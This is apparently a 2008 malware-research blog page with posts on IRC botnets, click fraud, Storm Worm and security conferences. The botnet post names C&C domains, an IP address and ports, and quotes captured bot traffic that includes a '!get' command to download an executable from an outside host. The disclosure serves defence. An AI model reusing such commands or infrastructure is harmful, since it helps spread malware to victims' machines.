Annoying Botnets

Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we receive also lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:
NICK rzyaaqgs

USER f020501 . . :-Service Pack 2

JOIN &virtu

:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
Posted by Thorsten Holz in malware at 14:44 | Comments (2) | Trackbacks (0)

SPRING 3

Saturday, May 31. 2008
This is a Call for Abstracts for a German workshop for young researchers, thus the following text is in German only.

---------------------------------------------------------------
Arbeitest Du auf dem Gebiet der Reaktiven Sicherheit?

Willst Du Dich mit anderen fachlich austauschen?

Dann haben wir etwas für Dich: Die Fachgruppe SIDAR ("Security - Intrusion Detection and Response") der Gesellschaft für Informatik e.V. veranstaltet die dritte SPRING. SPRING bietet Nachwuchswissenschaftlern auf dem Gebiet der Reaktiven Sicherheit eine Plattform, um themenbezogen Kontakte über die eigene Universität hinaus zu knüpfen. In diesem Jahr findet SPRING am 8. August an der Universität Mannheim statt.

Wir laden Diplomanden und Doktoranden ein, ihre Beiträge zu präsentieren. Die Vorträge können ein breites Spektrum abdecken, von noch laufenden Projekten, die ggf. erstmals einem breiteren Publikum vorgestellt werden, bis zu abgeschlossenen Forschungsarbeiten, die zeitnah auch auf Konferenzen präsentiert wurden bzw. werden sollen oder einen Schwerpunkt der eigenen Diplomarbeit oder Dissertation bilden.

Das Themenspektrum der Reaktiven Sicherheit beinhaltet:
  • Verwundbarkeitsanalyse
  • Intrusion Detection
  • Malware
  • Incident Management
  • Forensik

Mehr Informationen: SPRING 3 Webseite.
---------------------------------------------------------------
Posted by Thorsten Holz in administrativa at 09:55 | Comments (0) | Trackbacks (0)

Botnets & Click-Fraud

Friday, May 30. 2008
Dancho Danchev had recently an article about "Botnets committing click fraud observed". The article had a screenshot of statistics for one botnet, here are a two more examples:





The bots search for content and then also click on links, in order to gain some revenue via pay per click advertising. While there seem to be several such botnets in the wild, the overall number is presumably rather small. At least current IRC botnets which we track here at our lab show only very seldom signs of committing click-fraud.

If someone has samples of malware committing click-fraud or more information on this topic, please send me an e-mail!
Posted by Thorsten Holz in malware at 09:50 | Comments (0) | Trackbacks (0)

Storm Worm Presentation

Thursday, May 29. 2008
Two days ago I gave a presentation at IT-Sicherheits-Forum, a German conference on IT security, on Storm Worm. The presentation is now available. It provides an overview of Storm Worm and highlights various aspects of the botnet. The presentation is an extended version of our LEET'08 paper on the same topic.

Storm is still an interesting botnet. However, the botnet is getting smaller and smaller - nowadays there are typically less than ten thousand machines online during a typical day. Seems like the good ol' days of Storm are over...
Posted by Thorsten Holz in general, malware at 14:20 | Comments (0) | Trackbacks (0)

Call for Paper: EC2ND'08

Wednesday, May 14. 2008
The CFP for the fourth annual European Conference on Computer Network Defense (EC2ND'08) is up online at http://2008.ec2nd.org/.

The conference will take place on December 11th & 12th 2008 in the Faculty of Engineering and Computing at Dublin City University. The theme of the conference is the protection of computer networks. As with past EC2ND conferences, this year's event will encourage participants from academia and industry within Europe and beyond to discuss current topics in applied network and systems security.

EC2ND 2008 invites submissions presenting novel ideas at an early stage with the intention to act as a discussion forum and feedback channel for promising, innovative security research. While our goal is to solicit ideas that are not completely worked out, and might have challenging and interesting open questions, we expect submissions to be supported by some evidence of feasibility or preliminary quantitative results.

Important Dates:
Paper Submission Deadline: September 1st, 2008
Notification of Acceptance: September 18th, 2008
Final Paper Due: October 1st, 2008
Conference Dates: December 11th & 12th, 2008

You can find more information at http://2008.ec2nd.org/.
Posted by Thorsten Holz in general at 16:53 | Comments (0) | Trackbacks (0)

New Bot-Family Detected: Light-Bots

Thursday, May 8. 2008
Today, we observed a new family of bots while doing some research at our lab. While investigating several Kinder Surprises, we detected two samples of a bot family named Light-Bots (see the picture for more detail about the bots).



A closer analysis revealed that the bot exists in at least two version, we empirically found version S104 and S105. The propagation scheme is a variant of classical social engineering: victim's are tricked into buying a Kinder Surprise and the bot is contained in the egg, similar to a Trojan Horse. At this point, we do not have any CWSandbox report of the bot behavior nor any signatures. However, the bot also contains a README that indicates a close relationship with the domain www.magic-kinder.com:

Posted by Thorsten Holz in malware at 20:53 | Comments (0) | Trackbacks (0)
(Page 1 of 1, totaling 6 entries)